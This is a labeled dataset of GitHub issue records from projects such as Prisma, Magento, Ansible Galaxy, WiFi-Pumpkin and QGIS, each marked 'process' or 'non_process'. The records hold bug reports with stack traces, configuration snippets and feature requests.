17,846 | 23,784,345,364 | IssuesEvent | 2022-09-02 08:41:43 | prisma/prisma | https://api.github.com/repos/prisma/prisma | opened | Reformat unreachable code: Encountered impossible declaration during formatting: Pair { rule: type_alias, span: Span { str: "type TemplatesWorkflowBlocksPreviewCgFyYw1LdGVycy50CmlnZ2VyRxZlbnQ=Children", start: 84223, end: 84298 }, inner: [Pair { rule: TYPE_KEYWORD, span: Span { str: "type", start: 84223, end: 84227 }, inner: [] }, Pair { rule: identifier, span: Span { str: "TemplatesWorkflowBlocksPreviewCgFyYw1LdGVycy50CmlnZ2VyRxZlbnQ", start: 84228, end: 84289 }, inner: [] }, Pair { rule: base_type, span: Span { str: "Children", start: 84290, end: 84298 }, inner: [Pair { rule: identifier, span: Span { str: "Children", start: 84290, end: 84298 }, inner: [] }] }] } | kind/bug process/candidate topic: error reporting team/schema tech/engines/formatter engine | <!-- If required, please update the title to be clear and descriptive -->
Command: `prisma db pull`
Version: `4.3.0`
Binary Version: `c875e43600dfe042452e0b868f7a48b817b9640b`
Report: https://prisma-errors.netlify.app/report/14273
OS: `x64 linux 4.4.0-22621-Microsoft`
JS Stacktrace:
```
Error: [libs/datamodel/schema-ast/src/reformat.rs:49:18] internal error: entered unreachable code: Encountered impossible declaration during formatting: Pair { rule: type_alias, span: Span { str: "type TemplatesWorkflowBlocksPreviewCgFyYw1LdGVycy50CmlnZ2VyRxZlbnQ=Children", start: 84223, end: 84298 }, inner: [Pair { rule: TYPE_KEYWORD, span: Span { str: "type", start: 84223, end: 84227 }, inner: [] }, Pair { rule: identifier, span: Span { str: "TemplatesWorkflowBlocksPreviewCgFyYw1LdGVycy50CmlnZ2VyRxZlbnQ", start: 84228, end: 84289 }, inner: [] }, Pair { rule: base_type, span: Span { str: "Children", start: 84290, end: 84298 }, inner: [Pair { rule: identifier, span: Span { str: "Children", start: 84290, end: 84298 }, inner: [] }] }] }
at ChildProcess.<anonymous> (/node_modules/prisma/build/index.js:91978:28)
at ChildProcess.emit (events.js:400:28)
at Process.ChildProcess._handle.onexit (internal/child_process.js:282:12)
```
Rust Stacktrace:
```
0: user_facing_errors::Error::new_in_panic_hook
1: user_facing_errors::panic_hook::set_panic_hook::{{closure}}
2: std::panicking::rust_panic_with_hook
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/std/src/panicking.rs:702:17
3: std::panicking::begin_panic_handler::{{closure}}
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/std/src/panicking.rs:588:13
4: std::sys_common::backtrace::__rust_end_short_backtrace
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/std/src/sys_common/backtrace.rs:138:18
5: rust_begin_unwind
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/std/src/panicking.rs:584:5
6: core::panicking::panic_fmt
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/core/src/panicking.rs:142:14
7: schema_ast::reformat::unreachable
8: schema_ast::reformat::reformat
9: datamodel::reformat::reformat
10: datamodel::render_datamodel_and_config_to_string
11: <core::future::from_generator::GenFuture<T> as core::future::future::Future>::poll
12: <futures_util::future::either::Either<A,B> as core::future::future::Future>::poll
13: <futures_util::future::future::Then<Fut1,Fut2,F> as core::future::future::Future>::poll
14: <futures_util::future::either::Either<A,B> as core::future::future::Future>::poll
15: tokio::runtime::task::harness::poll_future
16: tokio::runtime::task::raw::poll
17: std::thread::local::LocalKey<T>::with
18: tokio::runtime::thread_pool::worker::Context::run_task
19: tokio::runtime::thread_pool::worker::Context::run
20: tokio::macros::scoped_tls::ScopedKey<T>::set
21: tokio::runtime::thread_pool::worker::run
22: <tokio::runtime::blocking::task::BlockingTask<T> as core::future::future::Future>::poll
23: tokio::runtime::task::harness::Harness<T,S>::poll
24: tokio::runtime::blocking::pool::Inner::run
25: std::sys_common::backtrace::__rust_begin_short_backtrace
26: core::ops::function::FnOnce::call_once{{vtable.shim}}
27: <alloc::boxed::Box<F,A> as core::ops::function::FnOnce<Args>>::call_once
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/alloc/src/boxed.rs:1872:9
<alloc::boxed::Box<F,A> as core::ops::function::FnOnce<Args>>::call_once
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/alloc/src/boxed.rs:1872:9
std::sys::unix::thread::Thread::new::thread_start
at /rustc/a8314ef7d0ec7b75c336af2c9857bfaf43002bfc/library/std/src/sys/unix/thread.rs:108:17
28: <unknown>
29: __clone
```
| 1.0 | process | 1 |
484,902 | 13,958,816,944 | IssuesEvent | 2020-10-24 13:46:00 | magento/magento2 | https://api.github.com/repos/magento/magento2 | closed | Widget field depends with type block KO | Component: Cms Component: Widget Fixed in 2.4.x Issue: Clear Description Issue: Confirmed Issue: Format is valid Issue: Ready for Work Priority: P2 Progress: ready for dev Reproduced on 2.1.x Reproduced on 2.2.x Reproduced on 2.3.x Reproduced on 2.4.x Severity: S2 Triage: Dev.Experience | <!--- Provide a general summary of the issue in the Title above -->
<!--- Before adding new issues, please, check this article https://github.com/magento/magento2/wiki/Issue-reporting-guidelines-->
### Preconditions
<!--- Provide a more detailed information of environment you use -->
<!--- Magento version, tag, HEAD, etc., PHP & MySQL version, etc.. -->
1. Magento 2.4-develop
2. PHP 7, MySQL: ANY
### Steps to reproduce
<!--- Provide a set of unambiguous steps to reproduce this bug include code, if relevant -->
1. Create a custom widget with widget.xml file
2. Create a select option chooser
```xml
<parameter name="test_select" xsi:type="select" visible="true" required="true" sort_order="10">
<label translate="true">Select</label>
<options>
<option name="val_1" value="val_1" selected="true">
<label translate="true">Value 1</label>
</option>
<option name="val_2" value="val_2">
<label translate="true">Value 2</label>
</option>
</options>
</parameter>
```
3. Create a CMS block Chooser that needs the second option selected
```xml
<parameter name="block_2_id" xsi:type="block" visible="true" required="true" sort_order="30">
<label translate="true">Block 2</label>
<depends>
<parameter name="test_select" value="val_2" />
</depends>
<block class="Magento\Cms\Block\Adminhtml\Block\Widget\Chooser">
<data>
<item name="button" xsi:type="array">
<item name="open" xsi:type="string" translate="true">Select Block...</item>
</item>
</data>
</block>
</parameter>
```
### Expected result
<!--- Tell us what should happen -->
1. When I select the Val 1, CMS Chooser is not visible
2. When I select the Val 2, CMS Chooser is visible
### Actual result
<!--- Tell us what happens instead -->
1. When I select the Val 1, CMS Chooser is visible
2. When I select the Val 2, CMS Chooser is visible
I checked: **/lib/web/mage/adminhtml/form.js**
In trackChange function, I add log after getting target row: `console.log(idTo);` (line 450 ~)
It tries to get item "options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id" but this selector doesn't exists! If I try $('options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id') I get NULL.
Generated HTML for CMS chooser is:
```html
<div class="admin__field field field-options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id with-addon required _required with-note"
data-ui-id="widget-instance-edit-tab-properties-fieldset-element-form-field-options-fieldset61f7a8d3475b5def75f144b49f5d69a9-block-2-id">
<label class="label admin__field-label" for="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id"
data-ui-id="widget-instance-edit-tab-properties-fieldset-element-label-parameters-block-2-id-label"><span>Block 2</span></label>
<div class="admin__field-control control">
<div class="admin__field">
<div class="control-value"></div>
<label class="widget-option-label"
id="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_ided82f16acfe32d39acd5b9f1d94c5fc2label">Onepage
Success</label>
<div id="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_ided82f16acfe32d39acd5b9f1d94c5fc2advice-container"
class="hidden"></div>
</div>
<div class="note admin__field-note" id="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id-note"></div>
</div>
</div>
<div class="admin__field field field-chooseroptions_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id with-addon"
data-ui-id="widget-instance-edit-tab-properties-fieldset-element-form-field-chooseroptions-fieldset61f7a8d3475b5def75f144b49f5d69a9-block-2-id">
<label class="label admin__field-label" for="chooseroptions_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id"
data-ui-id="widget-instance-edit-tab-properties-fieldset-element-note-label"><span></span></label>
<div class="admin__field-control control">
<div class="admin__field">
<div id="chooseroptions_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_id"
class="control-value admin__field-value"></div>
<input id="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_ided82f16acfe32d39acd5b9f1d94c5fc2value"
name="parameters[block_2_id]"
data-ui-id="widget-instance-edit-tab-properties-element-hidden-parameters-block-2-id" value="2"
class="widget-option required-entry" type="hidden">
<button id="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_ided82f16acfe32d39acd5b9f1d94c5fc2control"
title="Select Block..." type="button" class="action-default scalable btn-chooser"
onclick="options_fieldset61f7a8d3475b5def75f144b49f5d69a9_block_2_ided82f16acfe32d39acd5b9f1d94c5fc2.choose()"
data-ui-id="widget-button-9">
<span>Select Block...</span>
</button>
</div>
</div>
</div>
```
<!--- (This may be platform independent comment) -->
Thanks for your help! It seems to be a bug with widget chooser (like CMS block) and depends! | 1.0 | non_process | 0 |
123,070 | 12,191,204,077 | IssuesEvent | 2020-04-29 10:41:27 | galasa-dev/projectmanagement | https://api.github.com/repos/galasa-dev/projectmanagement | closed | Explain why ~/.galasa/overrides.properties needs editing | SimBank SimPlatform bug documentation | In the docs in galasa.dev - on the _Getting started -> Installing the Galasa Eclipse plug-in_ in the section _Configuring Eclipse for Galasa_
A user (even me) can install the _Eclipse plugin_ by following the instructions but it is significant that the _Setup Galasa Workspace_ creates an 'empty' (even though it's not empty) overrides.properties file and then the next step is to populate it with some given content (a superset of what's in the 'empty' version)
My first question to Will was, "why not just pre-populate it with the correct content?".
Will's response, "To show that this is what is binding the test to the simbank instance".
In which case, the docs should explain the reasoning otherwise no one will know!
| 1.0 | non_process | 0 |
6,295 | 9,301,916,492 | IssuesEvent | 2019-03-24 03:31:45 | vtloc/grokking-links | https://api.github.com/repos/vtloc/grokking-links | closed | Full Cycle Developers at Netflix — Operate What You Build | Company-Netflix Software Engineering Management Software Engineering Process | With the rise of DevOps and SRE (Site Reliability Engineering), many companies have decided to split DevOps and SRE into separate, dedicated roles.
At Netflix, however, the process went in the opposite direction. Instead of having members dedicated to DevOps and SRE, developers on Netflix teams now need to become Full-Cycle, meaning they also take care of the Deploy, Operate, Support, ... stages themselves.
What benefits does this approach bring?
https://medium.com/netflix-techblog/full-cycle-developers-at-netflix-a08c31f83249 | 1.0 | process | 1 |
482,823 | 13,914,023,563 | IssuesEvent | 2020-10-20 21:24:06 | CERT-Polska/drakvuf-sandbox | https://api.github.com/repos/CERT-Polska/drakvuf-sandbox | closed | Analysis list works poorly when there are lots of analyses | bug certpl drakcore/gui priority:medium | * Implement infinite scroll in AnalysisList view?
* The `/list` endpoint in `drak-web` backend should return a limited number of entries at a time and these should be somehow sorted according to creation time. | 1.0 | non_process | 0 |
12,435 | 14,930,887,640 | IssuesEvent | 2021-01-25 04:17:33 | lishu/vscode-svg2 | https://api.github.com/repos/lishu/vscode-svg2 | closed | Controls are very small | In process | 
The title in the tab has a normal size which is very readable. The elements inside the webview however are rather small (at least on a 1440p monitor). | 1.0 | process | 1 |
6,899 | 10,043,888,418 | IssuesEvent | 2019-07-19 08:41:16 | symfony/symfony-docs | https://api.github.com/repos/symfony/symfony-docs | closed | Add docs for: [Process] Deprecate Process::inheritEnvironmentVariable.. | Process | | Q | A
| ------------ | ---
| Feature PR | symfony/symfony#32475
| PR author(s) | @ogizanagi | 1.0 | process | 1 |
16,578 | 21,608,649,391 | IssuesEvent | 2022-05-04 07:44:58 | prisma/prisma | https://api.github.com/repos/prisma/prisma | closed | Error: [introspection-engine/connectors/mongodb-introspection-connector/src/sampler/statistics/indices.rs:167:71] called `Option::unwrap()` on a `None` value | bug/1-unconfirmed kind/bug process/candidate tech/engines/introspection engine topic: error reporting team/schema topic: prisma db pull topic: mongodb | <!-- If required, please update the title to be clear and descriptive -->
Command: `prisma db pull`
Version: `3.12.0`
Binary Version: `22b822189f46ef0dc5c5b503368d1bee01213980`
Report: https://prisma-errors.netlify.app/report/13785
OS: `arm64 darwin 21.3.0`
JS Stacktrace:
```
Error: [introspection-engine/connectors/mongodb-introspection-connector/src/sampler/statistics/indices.rs:167:71] called `Option::unwrap()` on a `None` value
at ChildProcess.<anonymous> (node_modules/prisma/build/index.js:51878:30)
at ChildProcess.emit (node:events:390:28)
at Process.ChildProcess._handle.onexit (node:internal/child_process:290:12)
```
Rust Stacktrace:
```
0: backtrace::backtrace::trace
1: backtrace::capture::Backtrace::new
2: user_facing_errors::Error::new_in_panic_hook
3: user_facing_errors::panic_hook::set_panic_hook::{{closure}}
4: std::panicking::rust_panic_with_hook
5: std::panicking::begin_panic_handler::{{closure}}
6: std::sys_common::backtrace::__rust_end_short_backtrace
7: _rust_begin_unwind
8: core::panicking::panic_fmt
9: core::panicking::panic
10: mongodb_introspection_connector::sampler::statistics::indices::add_to_models
11: mongodb_introspection_connector::sampler::statistics::Statistics::into_datamodel
12: <core::future::from_generator::GenFuture<T> as core::future::future::Future>::poll
13: <core::future::from_generator::GenFuture<T> as core::future::future::Future>::poll
14: <futures_util::future::either::Either<A,B> as core::future::future::Future>::poll
15: <futures_util::future::future::Then<Fut1,Fut2,F> as core::future::future::Future>::poll
16: tokio::runtime::task::harness::poll_future
17: tokio::runtime::task::raw::poll
18: std::thread::local::LocalKey<T>::with
19: tokio::runtime::thread_pool::worker::Context::run_task
20: tokio::runtime::thread_pool::worker::Context::run
21: tokio::macros::scoped_tls::ScopedKey<T>::set
22: tokio::runtime::thread_pool::worker::run
23: <tokio::runtime::blocking::task::BlockingTask<T> as core::future::future::Future>::poll
24: tokio::runtime::task::harness::Harness<T,S>::poll
25: tokio::runtime::blocking::pool::Inner::run
26: std::sys_common::backtrace::__rust_begin_short_backtrace
27: core::ops::function::FnOnce::call_once{{vtable.shim}}
28: std::sys::unix::thread::Thread::new::thread_start
29: __pthread_deallocate
```
| 1.0 | Error: [introspection-engine/connectors/mongodb-introspection-connector/src/sampler/statistics/indices.rs:167:71] called `Option::unwrap()` on a `None` value - <!-- If required, please update the title to be clear and descriptive -->
Command: `prisma db pull`
Version: `3.12.0`
Binary Version: `22b822189f46ef0dc5c5b503368d1bee01213980`
Report: https://prisma-errors.netlify.app/report/13785
OS: `arm64 darwin 21.3.0`
JS Stacktrace:
```
Error: [introspection-engine/connectors/mongodb-introspection-connector/src/sampler/statistics/indices.rs:167:71] called `Option::unwrap()` on a `None` value
at ChildProcess.<anonymous> (node_modules/prisma/build/index.js:51878:30)
at ChildProcess.emit (node:events:390:28)
at Process.ChildProcess._handle.onexit (node:internal/child_process:290:12)
```
Rust Stacktrace:
```
0: backtrace::backtrace::trace
1: backtrace::capture::Backtrace::new
2: user_facing_errors::Error::new_in_panic_hook
3: user_facing_errors::panic_hook::set_panic_hook::{{closure}}
4: std::panicking::rust_panic_with_hook
5: std::panicking::begin_panic_handler::{{closure}}
6: std::sys_common::backtrace::__rust_end_short_backtrace
7: _rust_begin_unwind
8: core::panicking::panic_fmt
9: core::panicking::panic
10: mongodb_introspection_connector::sampler::statistics::indices::add_to_models
11: mongodb_introspection_connector::sampler::statistics::Statistics::into_datamodel
12: <core::future::from_generator::GenFuture<T> as core::future::future::Future>::poll
13: <core::future::from_generator::GenFuture<T> as core::future::future::Future>::poll
14: <futures_util::future::either::Either<A,B> as core::future::future::Future>::poll
15: <futures_util::future::future::Then<Fut1,Fut2,F> as core::future::future::Future>::poll
16: tokio::runtime::task::harness::poll_future
17: tokio::runtime::task::raw::poll
18: std::thread::local::LocalKey<T>::with
19: tokio::runtime::thread_pool::worker::Context::run_task
20: tokio::runtime::thread_pool::worker::Context::run
21: tokio::macros::scoped_tls::ScopedKey<T>::set
22: tokio::runtime::thread_pool::worker::run
23: <tokio::runtime::blocking::task::BlockingTask<T> as core::future::future::Future>::poll
24: tokio::runtime::task::harness::Harness<T,S>::poll
25: tokio::runtime::blocking::pool::Inner::run
26: std::sys_common::backtrace::__rust_begin_short_backtrace
27: core::ops::function::FnOnce::call_once{{vtable.shim}}
28: std::sys::unix::thread::Thread::new::thread_start
29: __pthread_deallocate
```
| process | error called option unwrap on a none value command prisma db pull version binary version report os darwin js stacktrace error called option unwrap on a none value at childprocess node modules prisma build index js at childprocess emit node events at process childprocess handle onexit node internal child process rust stacktrace backtrace backtrace trace backtrace capture backtrace new user facing errors error new in panic hook user facing errors panic hook set panic hook closure std panicking rust panic with hook std panicking begin panic handler closure std sys common backtrace rust end short backtrace rust begin unwind core panicking panic fmt core panicking panic mongodb introspection connector sampler statistics indices add to models mongodb introspection connector sampler statistics statistics into datamodel as core future future future poll as core future future future poll as core future future future poll as core future future future poll tokio runtime task harness poll future tokio runtime task raw poll std thread local localkey with tokio runtime thread pool worker context run task tokio runtime thread pool worker context run tokio macros scoped tls scopedkey set tokio runtime thread pool worker run as core future future future poll tokio runtime task harness harness poll tokio runtime blocking pool inner run std sys common backtrace rust begin short backtrace core ops function fnonce call once vtable shim std sys unix thread thread new thread start pthread deallocate | 1 |
685,190 | 23,447,294,173 | IssuesEvent | 2022-08-15 21:04:31 | Anon-Planet/thgtoa | https://api.github.com/repos/Anon-Planet/thgtoa | closed | Threat Modeling Appendix B3 update | medium priority Information Update New Information Delete information Review request | Updates on the Threat Modeling Appendix B3:
1. Recommending LINDDUN
2. Possibly add the video mentioned in the collab room
3. Remove OWASP Links (clearly it's meant for web developers)
4. Moving STRIDE and PASTA in the below section (other resources available)
See Draft PR #187 | 1.0 | Threat Modeling Appendix B3 update - Updates on the Threat Modeling Appendix B3:
1. Recommending LINDDUN
2. Possibly add the video mentioned in the collab room
3. Remove OWASP Links (clearly it's meant for web developers)
4. Moving STRIDE and PASTA in the below section (other resources available)
See Draft PR #187 | non_process | threat modeling appendix update updates on the threat modeling appendix recommending linddun possibly add the video mentioned in the collab room remove owasp links clearly it s meant for web developers moving stride and pasta in the below section other resources available see draft pr | 0 |
243,653 | 7,860,339,251 | IssuesEvent | 2018-06-21 19:37:10 | ansible/galaxy | https://api.github.com/repos/ansible/galaxy | opened | Re-import of already imported repository fails with PermissionDenied error | area/backend priority/critical type/bug | ## Bug Report
##### SUMMARY
When trying to import already imported repository, import process fails with error 500.
##### STEPS TO REPRODUCE
1. Import repository
2. Open page "My Imports"
3. Go to repository imported on step 1.
4. Press import button (on the top right corner of the page).
##### EXPECTED RESULTS
Import process is started.
##### ACTUAL RESULTS
Server fails with `TypeError` exception:
```
Traceback (most recent call last):
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/core/handlers/exception.py", line 41, in inner
response = get_response(request)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/core/handlers/base.py", line 249, in _legacy_get_response
response = self._get_response(request)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/core/handlers/base.py", line 187, in _get_response
response = self.process_exception_by_middleware(e, request)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/core/handlers/base.py", line 185, in _get_response
response = wrapped_callback(request, *callback_args, **callback_kwargs)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/views/decorators/csrf.py", line 58, in wrapped_view
return view_func(*args, **kwargs)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/views/generic/base.py", line 68, in view
return self.dispatch(request, *args, **kwargs)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/rest_framework/views.py", line 494, in dispatch
response = self.handle_exception(exc)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/rest_framework/views.py", line 454, in handle_exception
self.raise_uncaught_exception(exc)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/rest_framework/views.py", line 491, in dispatch
response = handler(request, *args, **kwargs)
File "/galaxy/galaxy/api/views/views.py", line 412, in post
raise PermissionDenied(detail="You are not an owner of {0}".format(repository.name))
```
So there are two problems in the code:
1. `TypeError` exception is raised due to invalid call of `PermissionDenied` class.
2. `PermissionDenied` exception would have been triggered if called correctly, which is invalid behavior for repository imported by a user himself.
| 1.0 | Re-import of already imported repository fails with PermissionDenied error - ## Bug Report
##### SUMMARY
When trying to import already imported repository, import process fails with error 500.
##### STEPS TO REPRODUCE
1. Import repository
2. Open page "My Imports"
3. Go to repository imported on step 1.
4. Press import button (on the top right corner of the page).
##### EXPECTED RESULTS
Import process is started.
##### ACTUAL RESULTS
Server fails with `TypeError` exception:
```
Traceback (most recent call last):
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/core/handlers/exception.py", line 41, in inner
response = get_response(request)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/core/handlers/base.py", line 249, in _legacy_get_response
response = self._get_response(request)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/core/handlers/base.py", line 187, in _get_response
response = self.process_exception_by_middleware(e, request)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/core/handlers/base.py", line 185, in _get_response
response = wrapped_callback(request, *callback_args, **callback_kwargs)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/views/decorators/csrf.py", line 58, in wrapped_view
return view_func(*args, **kwargs)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/views/generic/base.py", line 68, in view
return self.dispatch(request, *args, **kwargs)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/rest_framework/views.py", line 494, in dispatch
response = self.handle_exception(exc)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/rest_framework/views.py", line 454, in handle_exception
self.raise_uncaught_exception(exc)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/rest_framework/views.py", line 491, in dispatch
response = handler(request, *args, **kwargs)
File "/galaxy/galaxy/api/views/views.py", line 412, in post
raise PermissionDenied(detail="You are not an owner of {0}".format(repository.name))
```
So there are two problems in the code:
1. `TypeError` exception is raised due to invalid call of `PermissionDenied` class.
2. `PermissionDenied` exception would have been triggered if called correctly, which is invalid behavior for repository imported by a user himself.
| non_process | re import of already imported repository fails with permissiondenied error bug report summary when trying to import already imported repository import process fails with error steps to reproduce import repository open page my imports go to repository imported on step press import button on the top right corner of the page expected results import process is started actual results server fails with typeerror exception traceback most recent call last file var lib galaxy venv lib site packages django core handlers exception py line in inner response get response request file var lib galaxy venv lib site packages django core handlers base py line in legacy get response response self get response request file var lib galaxy venv lib site packages django core handlers base py line in get response response self process exception by middleware e request file var lib galaxy venv lib site packages django core handlers base py line in get response response wrapped callback request callback args callback kwargs file var lib galaxy venv lib site packages django views decorators csrf py line in wrapped view return view func args kwargs file var lib galaxy venv lib site packages django views generic base py line in view return self dispatch request args kwargs file var lib galaxy venv lib site packages rest framework views py line in dispatch response self handle exception exc file var lib galaxy venv lib site packages rest framework views py line in handle exception self raise uncaught exception exc file var lib galaxy venv lib site packages rest framework views py line in dispatch response handler request args kwargs file galaxy galaxy api views views py line in post raise permissiondenied detail you are not an owner of format repository name so there are two problems in the code typeerror exception is raised due to invalid call of permissiondenied class permissiondenied exception would have been triggered if called correctly which is invalid behavior for 
repository imported by a user himself | 0 |
1,772 | 4,479,946,076 | IssuesEvent | 2016-08-27 23:17:41 | P0cL4bs/WiFi-Pumpkin | https://api.github.com/repos/P0cL4bs/WiFi-Pumpkin | closed | Deauth not populating for scapy or airodump-ng | in process priority | Using Kali with ALFA AWUS036NH and get nothing populated with settings to use Scapy and get the following in the terminal when choosing airodump-ng for the scan:
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python2.7/threading.py", line 801, in __bootstrap_inner
self.run()
File "/usr/lib/python2.7/threading.py", line 754, in run
self.__target(*self.__args, **self.__kwargs)
File "/usr/share/WiFi-Pumpkin/Modules/wireless/WirelessDeauth.py", line 153, in scan_diveces_airodump
exit_air = airdump_start(self.interface)
File "/usr/share/WiFi-Pumpkin/Core/utility/extract.py", line 33, in airdump_start
process.start()
File "/usr/share/WiFi-Pumpkin/Core/utility/threads.py", line 155, in start
self.procThread.start(self.cmd.keys()[0],self.cmd[self.cmd.keys()[0]])
AttributeError: 'list' object has no attribute 'keys' | 1.0 | Deauth not populating for scapy or airodump-ng - Using Kali with ALFA AWUS036NH and get nothing populated with settings to use Scapy and get the following in the terminal when choosing airodump-ng for the scan:
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python2.7/threading.py", line 801, in __bootstrap_inner
self.run()
File "/usr/lib/python2.7/threading.py", line 754, in run
self.__target(*self.__args, **self.__kwargs)
File "/usr/share/WiFi-Pumpkin/Modules/wireless/WirelessDeauth.py", line 153, in scan_diveces_airodump
exit_air = airdump_start(self.interface)
File "/usr/share/WiFi-Pumpkin/Core/utility/extract.py", line 33, in airdump_start
process.start()
File "/usr/share/WiFi-Pumpkin/Core/utility/threads.py", line 155, in start
self.procThread.start(self.cmd.keys()[0],self.cmd[self.cmd.keys()[0]])
AttributeError: 'list' object has no attribute 'keys' | process | deauth not populating for scapy or airodump ng using kali with alfa and get nothing populated with settings to use scapy and get the following in the terminal when choosing airodump ng for the scan exception in thread thread traceback most recent call last file usr lib threading py line in bootstrap inner self run file usr lib threading py line in run self target self args self kwargs file usr share wifi pumpkin modules wireless wirelessdeauth py line in scan diveces airodump exit air airdump start self interface file usr share wifi pumpkin core utility extract py line in airdump start process start file usr share wifi pumpkin core utility threads py line in start self procthread start self cmd keys self cmd attributeerror list object has no attribute keys | 1 |
11,619 | 14,483,924,967 | IssuesEvent | 2020-12-10 15:43:44 | qgis/QGIS | https://api.github.com/repos/qgis/QGIS | closed | Weird output from "Line density" function | Bug Feedback Processing | Hello everyone,
I ran the "line density" function in QGIS, but the result is just some horizontal stripes. I am using Linux version of QGIS. I have attached a screenshot of the resulted layer and the settings I used here: https://www.dropbox.com/s/8ylkdj107vfxwig/line_density.png?dl=0
I am not sure if it is a bug?
Many thanks | 1.0 | Weird output from "Line density" function - Hello everyone,
I ran the "line density" function in QGIS, but the result is just some horizontal stripes. I am using Linux version of QGIS. I have attached a screenshot of the resulted layer and the settings I used here: https://www.dropbox.com/s/8ylkdj107vfxwig/line_density.png?dl=0
I am not sure if it is a bug?
Many thanks | process | weird output from line density function hello everyone i ran the line density function in qgis but the result is just some horizontal stripes i am using linux version of qgis i have attached a screenshot of the resulted layer and the settings i used here i am not sure if it is a bug many thanks | 1 |
3,780 | 6,759,735,319 | IssuesEvent | 2017-10-24 18:08:09 | EPFLMachineLearningTeam01/Project1 | https://api.github.com/repos/EPFLMachineLearningTeam01/Project1 | closed | Analyze correlation matrix | data processing | Correlation or covariance matrix in order to see relation among features how much they depend on each other | 1.0 | Analyze correlation matrix - Correlation or covariance matrix in order to see relation among features how much they depend on each other | process | analyze correlation matrix correlation or covariance matrix in order to see relation among features how much they depend on each other | 1 |
55,568 | 23,504,427,366 | IssuesEvent | 2022-08-18 11:20:29 | hashicorp/nomad | https://api.github.com/repos/hashicorp/nomad | opened | nomad-sd: support the service meta field inline with Consul | type/enhancement theme/jobspec stage/accepted theme/service-discovery/nomad | ### Proposal
The Consul service integration supports [meta](https://www.nomadproject.io/docs/job-specification/service#meta) and [canary_meta](https://www.nomadproject.io/docs/job-specification/service#canary_meta) service parameters which are useful alongside tags as they are a key/value mapping rather than an array. It would be nice if these were also supported on Nomad services.
Please see https://github.com/hashicorp/nomad/issues/12589 for additional comments.
| 1.0 | nomad-sd: support the service meta field inline with Consul - ### Proposal
The Consul service integration supports [meta](https://www.nomadproject.io/docs/job-specification/service#meta) and [canary_meta](https://www.nomadproject.io/docs/job-specification/service#canary_meta) service parameters which are useful alongside tags as they are a key/value mapping rather than an array. It would be nice if these were also supported on Nomad services.
Please see https://github.com/hashicorp/nomad/issues/12589 for additional comments.
| non_process | nomad sd support the service meta field inline with consul proposal the consul service integration supports and service parameters which are useful alongside tags as they are a key value mapping rather than an array it would be nice if these were also supported on nomad services please see for additional comments | 0 |
174,626 | 13,501,083,886 | IssuesEvent | 2020-09-13 00:23:34 | open-contracting/lib-cove-ocds | https://api.github.com/repos/open-contracting/lib-cove-ocds | opened | Increase code coverage | testing | * [ ] schema.py: Extension-related code and error conditions
* [ ] lib/common_checks.py: Bad OCID prefix checks
* [ ] common_checks.py: Some if-else branches
Lower priority:
* [ ] api.py: Non-JSON input
* [ ] cli/__main__.py: All lines (see OCDS Kit for how to test)
| 1.0 | Increase code coverage - * [ ] schema.py: Extension-related code and error conditions
* [ ] lib/common_checks.py: Bad OCID prefix checks
* [ ] common_checks.py: Some if-else branches
Lower priority:
* [ ] api.py: Non-JSON input
* [ ] cli/__main__.py: All lines (see OCDS Kit for how to test)
| non_process | increase code coverage schema py extension related code and error conditions lib common checks py bad ocid prefix checks common checks py some if else branches lower priority api py non json input cli main py all lines see ocds kit for how to test | 0 |